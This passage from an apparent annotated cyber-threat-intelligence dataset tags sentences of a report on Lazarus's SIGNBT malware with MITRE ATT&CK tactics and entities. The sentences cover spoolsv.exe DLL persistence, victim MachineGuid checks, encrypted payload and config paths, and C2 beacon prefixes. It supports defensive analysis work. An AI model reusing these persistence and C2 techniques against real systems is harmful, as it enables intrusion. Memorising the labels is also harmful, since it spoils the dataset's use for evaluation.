and despite warnings and patches from the vendor, many of the vendor’s systems continued to use the flawed software, allowing the threat actor to exploit them.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit vulnerabilities in vendor systems using flawed software.", "entities": [ { "text": "the threat actor", "start": 197, "end": 213, "label": "ThreatActor" }, { "text": "allowing the threat actor to exploit them", "start": 188, "end": 229, "label": "Action" } ] }, { "uid": "aptnotes-10_aptnotes_report-p1-s3-d2877f", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "What’s remarkable is that these software vulnerabilities were not new, and despite warnings and patches from the vendor, many of the vendor’s systems continued to use the flawed software, allowing the threat actor to exploit them.", "sentence_text": "Fortunately, a proactive response by us detected an attack on another vendor and effectively thwarted the attacker’s efforts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p1-s4-647b55", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "Fortunately, a proactive response by us detected an attack on another vendor and effectively thwarted the attacker’s efforts.", "sentence_text": "Upon further investigation, we discovered that the software vendor that developed the exploited software had previously fallen victim to Lazarus several times.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p1-s5-0ce3b9", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "Upon further investigation, we discovered that the software vendor that developed the exploited software had previously fallen victim to Lazarus several times.", "sentence_text": "This recurring breach suggested a persistent and determined threat actor with the likely objective of stealing valuable source code or tampering with the software supply chain, and they continued to exploit vulnerabilities in the company’s software while targeting other software makers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit vulnerabilities in company software to target the organization and other software makers.", "entities": [ { "text": "threat actor", "start": 60, "end": 72, "label": "ThreatActor" }, { "text": "continued to exploit vulnerabilities in the company’s software", "start": 186, "end": 248, "label": "Action" }, { "text": "targeting other software makers", "start": 255, "end": 286, "label": "Action" } ] }, { "uid": "aptnotes-10_aptnotes_report-p1-s6-cefbaf", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "This recurring breach suggested a persistent and determined threat actor with the likely objective of stealing valuable source code or tampering with the software supply chain, and they continued to exploit vulnerabilities in the company’s software while targeting other software makers.", "sentence_text": "Infection timeline", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p1-s7-25a866", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "Infection timeline", "sentence_text": "The adversary demonstrated a high level of sophistication, employing advanced evasion techniques and introducing SIGNBT malware for victim control.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [], "procedure": "Adversary uses advanced evasion techniques and deploys SIGNBT malware to control victim systems.", "entities": [ { "text": "The adversary", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "employing advanced evasion techniques", "start": 59, "end": 96, "label": "Action" }, { "text": "introducing SIGNBT malware for victim control", "start": 101, "end": 146, "label": "Action" }, { "text": "SIGNBT malware", "start": 113, "end": 127, "label": "MalwareTool" } ] }, { "uid": "aptnotes-10_aptnotes_report-p2-s8-fe85af", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 2, "sentence_id": 8, "context_before": "The adversary demonstrated a high level of sophistication, employing advanced evasion techniques and introducing SIGNBT malware for victim control.", "sentence_text": "Executive summary:\nA software vendor was compromised through the exploitation of another high-profile software.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p2-s9-d164e9", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 2, "sentence_id": 9, "context_before": "Executive summary:\nA software vendor was compromised through the exploitation of another high-profile software.", "sentence_text": "The SIGNBT malware used in this attack employed a diverse infection chain and sophisticated techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p2-s10-f31a8a", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 2, "sentence_id": 10, "context_before": "The SIGNBT malware used in this attack employed a diverse infection chain and sophisticated techniques.", "sentence_text": "LPEClient used in this attack was observed executing a range of targeted attacks associated with the Lazarus group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p2-s11-366597", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 2, "sentence_id": 11, "context_before": "LPEClient used in this attack was observed executing a range of targeted attacks associated with the Lazarus group.", "sentence_text": "For more information, please contact:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p2-s12-8687d3", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 2, "sentence_id": 12, "context_before": "For more information, please contact:", "sentence_text": "intelreports@kaspersky.com SIGNBT loader In mid-July 2023, we detected a series of attacks on several victims who had been targeted through legitimate security software designed to encrypt web communications using digital certificates.", "relevant": "yes", "tactic": [ { "name": "Initial Access", "id": "TA0001" } ], "techniques": [ { "name": "Supply Chain Compromise", "id": "T1195" } ], "procedure": "Victims are targeted through compromised legitimate security software.", "entities": [ { "text": "had been targeted through legitimate security software", "start": 114, "end": 168, "label": "Action" } ] }, { "uid": "aptnotes-10_aptnotes_report-p2-s13-b03a65", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 2, "sentence_id": 13, "context_before": "intelreports@kaspersky.com SIGNBT loader In mid-July 2023, we detected a series of attacks on several victims who had been targeted through legitimate security software designed to encrypt web communications using digital certificates.", "sentence_text": "The exact method by which this software was exploited to deliver the malware remains elusive.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p2-s14-f41666", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "The exact method by which this software was exploited to deliver the malware remains elusive.", "sentence_text": "However, we identified post-exploitation activity within the processes of the legitimate software.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p2-s15-6d41cc", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "However, we identified post-exploitation activity within the processes of the legitimate software.", "sentence_text": "In one instance, while examining the memory of the compromised security software from a victim’s system, we discovered the presence of the SIGNBT malware accompanied by a shellcode.", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": null, "procedure": "The malware is found in memory within the compromised system.", "entities": [ { "text": "discovered the presence", "start": 108, "end": 131, "label": "Action" }, { "text": "SIGNBT malware", "start": 139, "end": 153, "label": "MalwareTool" } ] }, { "uid": "aptnotes-10_aptnotes_report-p2-s16-430aa2", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 2, "sentence_id": 16, "context_before": "In one instance, while examining the memory of the compromised security software from a victim’s system, we discovered the presence of the SIGNBT malware accompanied by a shellcode.", "sentence_text": "This shellcode was responsible for launching a Windows executable file directly in memory.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1620", "name": "Reflective Code Loading" } ], "procedure": "Launch executable directly in memory using shellcode.", "entities": [ { "text": "launching a Windows executable file directly in memory", "start": 35, "end": 89, "label": "Action" }, { "text": "shellcode", "start": 5, "end": 14, "label": "MalwareTool" } ] }, { "uid": "aptnotes-10_aptnotes_report-p2-s17-7f2a7e", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 2, "sentence_id": 17, "context_before": "This shellcode was responsible for launching a Windows executable file directly in memory.", "sentence_text": "The actor uses various tactics to establish and maintain persistence on compromised systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p2-s18-e941a3", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 2, "sentence_id": 18, "context_before": "The actor uses various tactics to establish and maintain persistence on compromised systems.", "sentence_text": "These include the creation of a file called ualapi.dll in the system folder, which is automatically loaded by the spoolsv.exe process at each system boot.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Create DLL in system folder to be loaded automatically at boot.", "entities": [ { "text": "creation of a file called ualapi.dll in the system folder", "start": 18, "end": 75, "label": "Action" }, { "text": "automatically loaded by the spoolsv.exe process at each system boot", "start": 86, "end": 153, "label": "Action" }, { "text": "ualapi.dll", "start": 44, "end": 54, "label": "MalwareTool" }, { "text": "spoolsv.exe", "start": 114, "end": 125, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p2-s19-36822c", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 2, "sentence_id": 19, "context_before": "These include the creation of a file called ualapi.dll in the system folder, which is automatically loaded by the spoolsv.exe process at each system boot.", "sentence_text": "Additionally, in several instances, registry entries were recorded to execute legitimate files for the purpose of malicious side-loading, further ensuring a resilient persistence mechanism.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Configure registry to execute legitimate files for side-loading persistence.", "entities": [ { "text": "registry entries were recorded to execute legitimate files for the purpose of malicious side-loading", "start": 36, "end": 136, "label": "Action" }, { "text": "registry entries", "start": 36, "end": 52, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p2-s20-f1b47a", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 2, "sentence_id": 20, "context_before": "Additionally, in several instances, registry entries were recorded to execute legitimate files for the purpose of malicious side-loading, further ensuring a resilient persistence mechanism.", "sentence_text": "Methods for loading the final payload 2/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p3-s21-daf961", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 21, "context_before": "Methods for loading the final payload 2/11", "sentence_text": "Leveraging the spoolsv.exe process for hijacking purposes is a long-standing strategy for Lazarus.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p3-s22-74d16c", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 22, "context_before": "Leveraging the spoolsv.exe process for hijacking purposes is a long-standing strategy for Lazarus.", "sentence_text": "Automatically loading the ualapi.dll file after each reboot is not a new technique for this actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p3-s23-654628", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 23, "context_before": "Automatically loading the ualapi.dll file after each reboot is not a new technique for this actor.", "sentence_text": "We have seen similar tactics used by the Gopuram malware in the past.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p3-s24-f244e4", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 24, "context_before": "We have seen similar tactics used by the Gopuram malware in the past.", "sentence_text": "The malicious ualapi.dll file was developed using a public source code known as Shareaza Torrent Wizard.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p3-s25-29a982", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 25, "context_before": "The malicious ualapi.dll file was developed using a public source code known as Shareaza Torrent Wizard.", "sentence_text": "It follows a typical Lazarus group approach of utilizing public source code as a foundation and injecting specific malicious functions into it.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Leverage public source code as a base and inject malicious functions into it to create modified malware.", "entities": [ { "text": "Lazarus group", "start": 21, "end": 34, "label": "ThreatActor" }, { "text": "utilizing public source code as a foundation", "start": 47, "end": 91, "label": "Action" }, { "text": "injecting specific malicious functions into it", "start": 96, "end": 142, "label": "Action" }, { "text": "public source code", "start": 57, "end": 75, "label": "MalwareTool" } ] }, { "uid": "aptnotes-10_aptnotes_report-p3-s26-3ce03b", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 26, "context_before": "It follows a typical Lazarus group approach of utilizing public source code as a foundation and injecting specific malicious functions into it.", "sentence_text": "This loader malware has a routine to verify the victim.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p3-s27-69bd4f", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 27, "context_before": "This loader malware has a routine to verify the victim.", "sentence_text": "It retrieves the victim’s MachineGuid by reading it from the Windows registry and then compares it with an embedded MachineGuid value.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1012", "name": "Query Registry" } ], "procedure": "Retrieve the victim’s MachineGuid from the Windows registry and compare it with an embedded value to verify the target.", "entities": [ { "text": "retrieves the victim’s MachineGuid by reading it from the Windows registry", "start": 3, "end": 77, "label": "Action" }, { "text": "compares it with an embedded MachineGuid value", "start": 87, "end": 133, "label": "Action" }, { "text": "the victim’s MachineGuid", "start": 13, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "the Windows registry", "start": 57, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "embedded MachineGuid value", "start": 107, "end": 133, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p3-s28-2579bf", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 28, "context_before": "It retrieves the victim’s MachineGuid by reading it from the Windows registry and then compares it with an embedded MachineGuid value.", "sentence_text": "Only if the victim’s MachineGuid matches the expected one does the malware proceed to the next step.", "relevant": "yes", "tactic": [ { "name": "Defense Evasion", "id": "TA0005" } ], "techniques": [ { "name": "Virtualization/Sandbox Evasion", "id": "T1497" } ], "procedure": "The malware checks the victim identifier and proceeds only if it matches expected values.", "entities": [ { "text": "does the malware proceed", "start": 58, "end": 82, "label": "Action" } ] }, { "uid": "aptnotes-10_aptnotes_report-p3-s29-10383a", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 29, "context_before": "Only if the victim’s MachineGuid matches the expected one does the malware proceed to the next step.", "sentence_text": "The malware then reads the payload from a hard-coded file path and continues its malicious activities.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "Read a payload from a hard-coded file path and proceed with subsequent malicious operations.", "entities": [ { "text": "The malware then reads the payload from a hard-coded file path", "start": 0, "end": 62, "label": "Action" }, { "text": "continues its malicious activities", "start": 67, "end": 101, "label": "Action" }, { "text": "The malware", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "the payload", "start": 23, "end": 34, "label": "MalwareTool" }, { "text": "a hard-coded file path", "start": 40, "end": 62, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p3-s30-79ff21", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 30, "context_before": "The malware then reads the payload from a hard-coded file path and continues its malicious activities.", "sentence_text": "Payload path: C:\\Windows\\system32\\config\\systemprofile\\appdata\\Local\\tw-100a-a00- e14d9.tmp The loader process retrieves the first 32 bytes from tw-100a-a00-e14d9.tmp and uses this data as an AES decryption key to decrypt the remaining contents.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Retrieve bytes from file and use as AES key to decrypt payload.", "entities": [ { "text": "retrieves the first 32 bytes from tw-100a-a00-e14d9.tmp and uses this data as an AES decryption key to decrypt the remaining contents", "start": 111, "end": 244, "label": "Action" }, { "text": "tw-100a-a00-e14d9.tmp", "start": 145, "end": 166, "label": "Infrastructure_Indicator" }, { "text": "AES decryption key", "start": 192, "end": 210, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p3-s31-b271a9", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 31, "context_before": "Payload path: C:\\Windows\\system32\\config\\systemprofile\\appdata\\Local\\tw-100a-a00- e14d9.tmp The loader process retrieves the first 32 bytes from tw-100a-a00-e14d9.tmp and uses this data as an AES decryption key to decrypt the remaining contents.", "sentence_text": "Config file: C:\\Windows\\system32\\config\\systemprofile\\appdata\\Local\\tw-100b-a00- e14d9.tmp Inside this file is a base64-encoded string, mirroring the approach used in the previous SIGNBT malware method.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Store configuration as base64-encoded string.", "entities": [ { "text": "base64-encoded string", "start": 113, "end": 134, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p3-s32-6c16af", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 32, "context_before": "Config file: C:\\Windows\\system32\\config\\systemprofile\\appdata\\Local\\tw-100b-a00- e14d9.tmp Inside this file is a base64-encoded string, mirroring the approach used in the previous SIGNBT malware method.", "sentence_text": "The first 32 characters of this string serve as the AES decryption key, while the subsequent data contains configuration information used by the malware.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Use part of encoded data as AES decryption key.", "entities": [ { "text": "serve as the AES decryption key", "start": 39, "end": 70, "label": "Action" }, { "text": "AES decryption key", "start": 52, "end": 70, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p3-s33-f3fdd0", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 33, "context_before": "The first 32 characters of this string serve as the AES decryption key, while the subsequent data contains configuration information used by the malware.", "sentence_text": "This decrypted configuration data includes details such as three C2 addresses, which are referred to as proxies, sleep intervals, version information, monitored targets, and various other parameters critical to the malware’s operation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p3-s34-6a8983", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 34, "context_before": "This decrypted configuration data includes details such as three C2 addresses, which are referred to as proxies, sleep intervals, version information, monitored targets, and various other parameters critical to the malware’s operation.", "sentence_text": "SIGNBT\nThe majority of SIGNBT malware instances are launched through the malware loader, which operates exclusively in memory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p3-s35-916937", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 35, "context_before": "SIGNBT\nThe majority of SIGNBT malware instances are launched through the malware loader, which operates exclusively in memory.", "sentence_text": "Upon execution, the malware begins communicating with the C2 server by sending a beacon after initialization of its configuration data.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Send beacon to C2 server after initialization.", "entities": [ { "text": "begins communicating with the C2 server by sending a beacon", "start": 28, "end": 87, "label": "Action" }, { "text": "C2 server", "start": 58, "end": 67, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p3-s36-011ed9", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 36, "context_before": "Upon execution, the malware begins communicating with the C2 server by sending a beacon after initialization of its configuration data.", "sentence_text": "In its C2 communication, the malware uses distinctive strings that start with SIGNBT.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1001", "name": "Data Obfuscation" } ], "procedure": "Use distinctive strings in C2 communication.", "entities": [ { "text": "uses distinctive strings that start with SIGNBT", "start": 37, "end": 84, "label": "Action" }, { "text": "C2 communication", "start": 7, "end": 23, "label": "Infrastructure_Indicator" }, { "text": "SIGNBT", "start": 78, "end": 84, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p3-s37-b68df0", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 37, "context_before": "In its C2 communication, the malware uses distinctive strings that start with SIGNBT.", "sentence_text": "This unique characteristic has earned it the designation of SIGNBT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p3-s38-45d206", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 38, "context_before": "This unique characteristic has earned it the designation of SIGNBT.", "sentence_text": "In addition, the malware uses different prefixes at each stage of its C2 operation to verify and maintain its activities.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1001", "name": "Data Obfuscation" } ], "procedure": "Use prefixes in C2 communication to verify activity.", "entities": [ { "text": "uses different prefixes at each stage of its C2 operation to verify and maintain its activities", "start": 25, "end": 120, "label": "Action" }, { "text": "C2 operation", "start": 70, "end": 82, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p3-s39-4eeb9e", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 3, "sentence_id": 39, "context_before": "In addition, the malware uses different prefixes at each stage of its C2 operation to verify and maintain its activities.", "sentence_text": "Prefix name Description 3/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p4-s40-ac8a61", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 4, "sentence_id": 40, "context_before": "Prefix name Description 3/11", "sentence_text": "SIGNBTLG Initial connection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p4-s41-37196d", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 4, "sentence_id": 41, "context_before": "SIGNBTLG Initial connection.", "sentence_text": "SIGNBTKE Success – update the key and ask for a profiling process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p4-s42-499634", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 4, "sentence_id": 42, "context_before": "SIGNBTKE Success – update the key and ask for a profiling process.", "sentence_text": "SIGNBTGC Ask for commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p4-s43-667b36", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 4, "sentence_id": 43, "context_before": "SIGNBTGC Ask for commands.", "sentence_text": "SIGNBTFI Operation failed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p4-s44-ff4781", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 4, "sentence_id": 44, "context_before": "SIGNBTFI Operation failed.", "sentence_text": "SIGNBTSR Operation success.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p4-s45-965ca9", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 4, "sentence_id": 45, "context_before": "SIGNBTSR Operation success.", "sentence_text": "The malware employs a multi-step process to create a 24-byte value for various purposes.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "Generate a 24-byte value through a multi-step process for subsequent malicious use.", "entities": [ { "text": "The malware", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "employs a multi-step process to create a 24-byte value", "start": 12, "end": 66, "label": "Action" }, { "text": "a 24-byte value", "start": 51, "end": 66, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p4-s46-3a7a17", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 4, "sentence_id": 46, "context_before": "The malware employs a multi-step process to create a 24-byte value for various purposes.", "sentence_text": "First, it generates this value with the following components:\n1. 8 bytes of hard-coded value (SIGNBTLG): this is a fixed part of the value and serves to validate the legitimacy of the client’s connection.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1001", "name": "Data Obfuscation" } ], "procedure": "Generate validation value using hard-coded component.", "entities": [ { "text": "generates this value", "start": 10, "end": 30, "label": "Action" }, { "text": "hard-coded value (SIGNBTLG)", "start": 76, "end": 103, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p4-s47-49692f", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 4, "sentence_id": 47, "context_before": "First, it generates this value with the following components:\n1. 8 bytes of hard-coded value (SIGNBTLG): this is a fixed part of the value and serves to validate the legitimacy of the client’s connection.", "sentence_text": "2. 8 bytes from the MD5 hash of the hostname: the first 8 bytes of the MD5 hash of the victim’s computer name are included, helping to distinguishing each victim.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1001", "name": "Data Obfuscation" } ], "procedure": "Generate host-based identifier using MD5 hash.", "entities": [ { "text": "8 bytes from the MD5 hash of the hostname", "start": 3, "end": 44, "label": "Action" }, { "text": "MD5 hash", "start": 20, "end": 28, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p4-s48-6a17ee", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 4, "sentence_id": 48, "context_before": "2. 8 bytes from the MD5 hash of the hostname: the first 8 bytes of the MD5 hash of the victim’s computer name are included, helping to distinguishing each victim.", "sentence_text": "After creating this 24-byte value, the malware generates an additional 24 bytes of random data.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1001", "name": "Data Obfuscation" } ], "procedure": "Generate random data for communication.", "entities": [ { "text": "generates an additional 24 bytes of random data", "start": 47, "end": 94, "label": "Action" } ] }, { "uid": "aptnotes-10_aptnotes_report-p4-s49-3b729e", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 4, "sentence_id": 49, "context_before": "After creating this 24-byte value, the malware generates an additional 24 bytes of random data.", "sentence_text": "These two sets of 24 bytes are then XORed together using another randomly generated 24-byte key.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p4-s50-a48f45", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 4, "sentence_id": 50, "context_before": "These two sets of 24 bytes are then XORed together using another randomly generated 24-byte key.", "sentence_text": "Subsequently, both the resulting value and the 24-byte key are encoded with base64.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p4-s51-28de96", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 4, "sentence_id": 51, "context_before": "Subsequently, both the resulting value and the 24-byte key are encoded with base64.", "sentence_text": "Finally, these encoded values are combined with either three or seven randomly generated HTTP parameter names.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p4-s52-6b74f6", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 4, "sentence_id": 52, "context_before": "Finally, these encoded values are combined with either three or seven randomly generated HTTP parameter names.", "sentence_text": "In all future C2 communications, the malware uses a similar structure, making it more challenging to detect and analyze its communications.\n4/11", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Use consistent C2 communication structure to evade detection.", "entities": [ { "text": "uses a similar structure", "start": 45, "end": 69, "label": "Action" }, { "text": "C2 communications", "start": 14, "end": 31, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p5-s53-e77e0c", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 5, "sentence_id": 53, "context_before": "In all future C2 communications, the malware uses a similar structure, making it more challenging to detect and analyze its communications.", "sentence_text": "Structure of HTTP POST data The malware uses a mechanism to validate the response data received from the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Validate C2 response data using a mechanism.", "entities": [ { "text": "uses a mechanism to validate the response data received from the C2 server", "start": 40, "end": 114, "label": "Action" }, { "text": "HTTP POST data", "start": 13, "end": 27, "label": "Infrastructure_Indicator" }, { "text": "C2 server", "start": 105, "end": 114, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-10_aptnotes_report-p5-s54-d486d4", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 5, "sentence_id": 54, "context_before": "Structure of HTTP POST data The malware uses a mechanism to validate the response data received from the C2 server.", "sentence_text": "Specifically, it checks to see if the response data contains a hard-coded HTML script.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p5-s55-af1106", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 5, 